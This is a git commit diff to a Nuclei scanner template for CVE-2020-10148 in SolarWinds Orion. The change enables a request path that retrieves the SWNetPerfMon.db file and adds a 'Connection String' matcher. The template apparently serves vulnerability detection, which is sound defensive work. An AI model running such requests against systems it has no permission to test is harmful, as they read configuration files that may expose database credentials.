misc update to CVE-2020-10148

2022-03-29 16:00:27 +05:30 · 2022-03-29 16:00:27 +05:30 · 9012b2396a
parent c21c81095b
commit 9012b2396a
1 changed files with 7 additions and 5 deletions
--- a/cves/2020/CVE-2020-10148.yaml
+++ b/cves/2020/CVE-2020-10148.yaml
@ -23,20 +23,22 @@ requests:
  - method: GET
    path:
      - "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
-      # - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
-      # Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.
+      - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
+
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
+        part: body
        words:
          - "SolarWinds.Orion.Core."
-          # - "Connection String" # Commented matchers can be used for "SWNetPerfMon.db" file.
-        part: body
+          - "Connection String"
+        condition: or

      - type: word
+        part: header
        words:
          - "text/plain"
-        part: header

      - type: status
        status: